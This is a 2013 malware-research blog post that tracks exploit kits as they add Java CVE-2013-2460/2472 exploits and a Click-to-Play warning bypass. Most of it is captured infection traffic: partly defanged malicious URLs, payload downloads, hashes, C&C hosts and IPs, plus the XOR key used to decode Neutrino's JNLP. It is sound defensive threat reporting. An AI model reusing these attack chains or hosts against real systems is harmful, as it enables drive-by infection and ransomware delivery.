2013-09-20 - Exploit Integration

jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits




A new variant of a "Kore-ish" Cool EK appeared few days ago.
Yes...it's difficult to follow the EK fast moving landscape...No payload in the jar for that one.
Some instances of this "Cool EK"
 in URLQuery
I faced it often where I used to see Kore (aka Sibhost) Exploit Kit.
It is also used to spread the Urausy Ransomware and FakeAV (so... BestAV stuff)

All jar found there were identical as those in Blackhole. Till today.

CVE-2013-2460 + Click2Play Bypass :

That CVE was already in use in Private Exploit Pack but it was noisy (Imposition then made it optional )

CVE-2013-2460 successfull path in Cool EK (Kore-ish)
Click2Play Bypass inside 2013-09-20


GET http://[redacted].tacogratis .com/index.php?p=5267
200 OK (text/html)

Key Piece of the landing


GET http://[redacted].tacogratis .com/index.php?p=5290
200 OK (text/javascript)

GET http://[redacted].tacogratis .com/index.php?p=5268 fb1decbef1c4361eb421a3496201ef30
200 OK (application/java-archive)

GET http://[redacted].tacogratis .com/index.php?p=5268
200 OK (application/java-archive)

GET http://cghtuj.tacogratis .com/index.php?p=5275&e=14
200 OK (application/x-msdownload)  170896de44d75651bbbd9358b0f11c34 (Urausy Ransomware)

----- Off Topic ----
Payload is rotating fast (2 more md5) :
b56348220f83ad9db50cb5beb564148b
64ef8f2cb215af4b2fbcb51cadfcc025

Urauy Ransomware - DE design - 2013-09-20
(BestAV soft 2)


Note : on another thread you can get  a FakeAV

Payload call with bigger charge


9d8d3094849f685859945140721aafb1
7fb9423c4bdf7080137745e81ba38362
13e24b552ea472146495ac8a33cca975

Other payload from this "Kore-ish" Cool EK
(BestAV Soft1)
-------------------

So what's that  Click2Play bypass ?

Quite surely : http://seclists.org/bugtraq/2013/Jul/41
2013-06-18 - Vulnerability Fixed in Java 7u25

Yes :

Warning with jre7u25
(and as CVE-2013-2460 is patch too...clicking on run there won't put you at risk)


It's the first time I see that.
5 days ago :

Who sold it ?
??

No download link for now. Yes it will spread fast anyway.
It's easy to get rid of all these Exploit Kits : update !

<edit1 2013-09-21>
Already in Sakura...surely cause of that blog post. It's often difficult to decide how much you can write about something.

Sakura CVE-2013-2460 & Click2Play Bypass :


Sakura featuring CVE-2013-2460 & Click2Play bypass
2013-09-21


GET http://[redacted]253 .pw:8509/me.php
200 OK (text/html)


Precision Strike
new Click2Play bypass for 21 version
Jnlp call

GET http://[redacted] .pw:8509/[redacted].ee
200 OK (application/java-archive) dca89d839abbb8f621a87de94d20d8f2 CVE-2013-2460

Piece of CVE-2013-2460 in Sakura Jar
2013-09-21


 GET http://[redacted] .pw:8509/bodystarswild.ee
200 OK (application/java-archive)

GET http://[redacted] .pw:8509/2889.ld
200 OK (application/octet-stream) Once decoded : 5fba8226303967ccfd27ea8710a8b99d I think it's a Smokebot

----- Off Topic ----
C&C Calls :
mexstat757.com POST /satep757/index.php
mexstat220.pw GET /setex/sev57.exe 
mexstat220.pw  GET  /setex/pm555.exe
etc...

46.165.201.27 
16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH

It's the same guys than those who were behind this one year old post :
Since then Smoke Bot is now encrypting its network calls.

---------------------- 
</edit1>
<edit2: 2013-09-23>
Nuclear Pack : CVE-2013-2460 + Click2Play bypass

Announced Underground :
"добавлен новы exploit, пробив увеличен. работает тихо и не палится"  Nuclear
which means something like:
"New exploit added, breaking rate increased, works silently and scorched"

CVE-2013-2460 with no security prompt successful path in Nuclear Pack
2013-09-23


GET http://[redacted].flogdoyfohoqobl .biz:12421/3dfa4ffa555573ba6fbb54a243289806/4/5b1bb46b5a96bee3ebbb1d2251d968bb.html
200 OK (text/html)


Precision Strike  (Thanks @EKWatcher )
jnlp call in Nuclear Pack
After Deobfuscation (Thanks @EKWatcher )


GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java)


GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java)
 e03455403f226b23be42b30733a26101


Piece of CVE-2013-2460 in Nuclear Pack
2013-09-23
GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2
200 OK (application/octet-stream) Decoded : 3a9d1dcad1176717711eb92b25f7d6b0

GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2/2
200 OK (application/octet-stream)

----------- Out of Topic -----------
C&C :
185.6.80.125 - 61422 | 185.6.80.0/24 | TD-VITA | RU | - | TD-VITA LLC.
for instance :
POST /mBj7cjhH/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: halifaxkilo.com

Analysis by Joe Sandbox Cloud
------------------------------------
</edit2>
<edit3>
Styx CVE-2013-2472 + Click2Play Bypass :

Many Thanks to Timo Hirvonen from F-Secure for identifying the CVE.


Reveton Pushed in Styx 2013-09-24
Using CVE-2013-2472 & Click2Play Bypass on jre7u21
We can see the call for Bitcoin miner after VM Reboot.



GET http://[redacted].info/hsZv/3J17_DtR/13C_ht11nF-E17H_R60kufr_0HUzD0c/xrB/055RR0/iWsU0-VEw-x0Rm-ou0xvC-3/
302 Found to http://an-wis.info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/
200 OK (text/html)

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/yavirts.html
200 OK (text/html)

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/jplay.html
200 OK (text/html) (jnlp call)


Click2Play Bypass in Styx
2013-09-24


GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/NyJjQvjE.jar
200 OK (application/java-archive)

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/NyJjQvjE.jar
200 OK (application/java-archive) 3c812730758b9118ba4764adf3ab53bc

GET http://[redacted].info/r007gL_0e2X80Ooo-30N1XG/0C/rt/d0tg2C-0e_l6L0H_NL40C05W/0aDec0A/b5g-04-yuI0i3/KS00i/AE0m/VuD0uHFw0/pRgP0Dy-z80J_Aek0Y_hcr0AhC_80_lWyk13f/It0865-L0O_GKn-0E/1dA0baP00-1EAC0QAs/R0f-4Bq0ZIn-f0X_4n-30otyr-05Y83-0ZxLA/17y/RZ0I/MM60-Ajpo06eml/0gVj_P0Yv3E0MRn/30AF6J0H/9ZU0f/WRI0wAPs11/ttO0CZz_j0leh-i0k1X_l0oDdd_0ah_pC/kC4XSO15ZD.exe?lniV=7decb&h=16
200 OK (application/x-dosexec) 4a0e95c28b2b5b6259b7b558c3565988

----------- Out of Topic : Payload -----------
Reveton.
C&C Reverse Proxy :

Reveton Calling Home
2013-09-24
64.191.122.10 - 21788 | 64.191.0.0/17 | NOC | US | NOCINC.COM | NETWORK OPERATIONS CENTER INC.
We can see the call to the Bitcoin Miner (read: Ransomware Puts Your System To Work Mining Bitcoins )
The binary is not there anymore since 2013-09-11 (was : 2794fd5b64b585df132b4524b82d18c8 )
--------------------------------------------------
</edit3>
<edit4 : 2013-09-24>
Neutrino : CVE-2013-2460 + Click2Play bypass

It seems the integration has been far from smooth for the Neutrino coder.
The jar is inside the Exploit Kit since more than 3 days. The coder announced the new exploit 2 days ago...but the warning was still here and even validating the execution your were safe. Some protections were removed (you could hit the exploit kit as many time as you want with same IP without problem...seems like someone else was testing it :) ). And the 22 (sunday) more than half a day with all threads in 404...But in the end...he made it.

CVE-2013-2460 + Click2Play ByPass in Neutrino
2013-09-24
Will only keep relevant calls :

GET http://[redacted].dyndns .info:8000/gxstfkhf?ttdwjipi=4128154
200 OK (text/html)

GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)

GET http://[redacted].dyndns .info:8000/index.js
200 OK (application/x-javascript)

POST http://[redacted].dyndns .info:8000/twpnnurhbg
200 OK (text/html)


Encoded Jnlp
Applying the Neutrino "xor" function with key "qoxacfix"

Jnlp
Base64 decode of the jnlp_embedded value :




GET http://[redacted].dyndns .info:8000/rclmrcfdvdjtq?joiihv=uihuzdhhuq
200 OK (application/java-archive) 

GET http://[redacted].dyndns .info:8000/rclmrcfdvdjtq?joiihv=uihuzdhhuq
200 OK (application/java-archive) 3fcac6c64ce0ca28ee615a8fad224dd3

Piece of slightly obfuscated CVE-2013-2460 in Neutrino
(since 2013-09-21 in fact)


GET http://[redacted].dyndns .info:8000/faybcc?juzickeew=uihuzdhhuq
200 OK (application/octet-stream) Decoded : a126281477c856b9358de5aea1369990 who drop  : 898b9aee9931230ef3bc0c59eb541c55 - Didn't spend too much time to figure out what it is.
Saw 404 POST to : http://allewnuado .ru/perl/config.php -  79.174.64.127
47385 | 79.174.64.0/19 | HOSTING-COMPANY | RU | HC.RU | HOSTING CENTER LTD.
</edit4>
<edit5 2013-09-25>
Blackhole : CVE-2013-2460 Click2Play Bypass

I saw that jar yesterday already being pushed without exploitation to jre7u21 in /closest/ Blackhole.
It's the exact same jar as the Cool EK in "/index.php?p=" that introduce the Bypass.
Today on the /Home/ (aka q.php) Darkleech fuelled BH EK the Click2Play bypass is here.
And payload is as always Pony (steal passwords and act as loader. No change since at least December. It pushes Urausy in some countries or Nymaim in other countries (which can then get another version of Nymaim with locker functionnality or Zaccess).
This has been well explained by Eset.

BH EK /Home/ aka q.php CVE-2013-2460 + Click2play bypass
2013-09-25


GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php
200 OK (text/html)

Conditions for the bypass call

jnlp call


GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?!0M!6J=1F_*H4z-I*!f&Jk__*zFA_92-*=7*K9_Kp1
200 OK (application/java-archive)

GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?!0M!6J=1F_*H4z-I*!f&Jk__*zFA_92-*=7*K9_Kp1
200 OK (application/java-archive) f5fc4540e6e64efee8711007ac0d4ed1

CVE-2013-2460 in BH EK
2013-09-25
GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?-*Z73922k0NUj8=8b8cwd8aww&*F21!gX=w88c8dw6wdw7wbwbwd8c&!_239!6W25u*_=ww&59*!a34-d1_2!uT=u*g88*8&OF2EFwol0!3_9=7ZF!Y*08*!P_75m
200 OK (application/x-msdownload) - acb80f0eaa177953a53f3be188c8e3da  Analysis and sample: Malwr.com
</edit5>
<edit6 2013-10-14>
Kore :  CVE-2013-2460
(Thanks to Timo Hirvonen for confirmation)
CVE-2013-2460 (?) and Click2play Bypass in Kore 2013-10-14
Pushing Urausy Obviously
GET http://zanol.muabannhadatdothi .com:90/web.html
200 OK (text/html)

Piece of Kore Landing.
Not what i would call a precision Strike !
GET http://zanol.muabannhadatdothi .com:90/jquery.js
200 OK (application/javascript)

GET http://zanol.muabannhadatdothi .com:90/web.html2.zip
200 OK (application/octet-stream)

GET http://zanol.muabannhadatdothi .com:90/web.html2.zip
200 OK (application/octet-stream)

GET http://zanol.muabannhadatdothi .com:90/web.html2.zip
200 OK (application/octet-stream)

GET http://zanol.muabannhadatdothi .com:90/web.html2.zip
200 OK (application/octet-stream)

GET http://zanol.muabannhadatdothi .com/web.html?id=2&text=1164
200 OK (text/html) (call back)

</edit6>
<edit7 2013-10-26>
Magnitude : CVE-2013-2463 + C2P bypass
It's inside Magnitude (popads) since at least 2013-10-19
See : Magnitude EK : Pop Pop !
</edit7>

<edit8 2013-10-31>
Sweet Orange : CVE-2013-2460 + C2P Bypass:
Seems to be inside since few days.
Thanks to Timo Hirvonen from F-Secure for naming that CVE. Thanks to Chris Wakelin for additionnal help on this.

Sweet Orange 2013-10-31
CVE-2013-2460 + Click2play bypass successful pass
GET http://8c10d9c992f1064f.dyndns-remote .com/voip/ports.php?tracetabs=43
200 OK (text/html)

Piece of Landing after deobfuscation showing the jnlp.
GET http://8c10d9c992f1064f.dyndns-remote .com/voip/gBSlO
200 OK (application/x-java-archive) 87c775be2b9519dd97a0b84da3e3b9b1  CVE-2013-2460 inside

GET http://8c10d9c992f1064f.dyndns-remote .com/voip/gBSlO
200 OK (application/x-java-archive)

GET http://8c10d9c992f1064f.dyndns-remote .com/voip/IWcaNgp
200 OK (application/x-java-archive)

GET http://8c10d9c992f1064f.dyndns-remote .com/voip/OBTjZPq
200 OK (application/x-java-archive)


GET http://8c10d9c992f1064f.dyndns-remote .com/spanish.php?edit=269&main=4&comp=158&question=171&press=416&staff=385&lang=265&media=552&entry=160&affiliate=156 bc57bdf43e0e2d0efe2d0c0e06cddd9d
200 OK (application/octet-stream)

Files : 2 fiddler here (owncloud via goo.gl)
</edit8>


EXPLOIT-KIT
Sakura Kore-Ish CVE-2013-2460 Nuclear Pack Kool EK Neutrino Styx Click2play Bypass. Cool EK CVE-2013-2472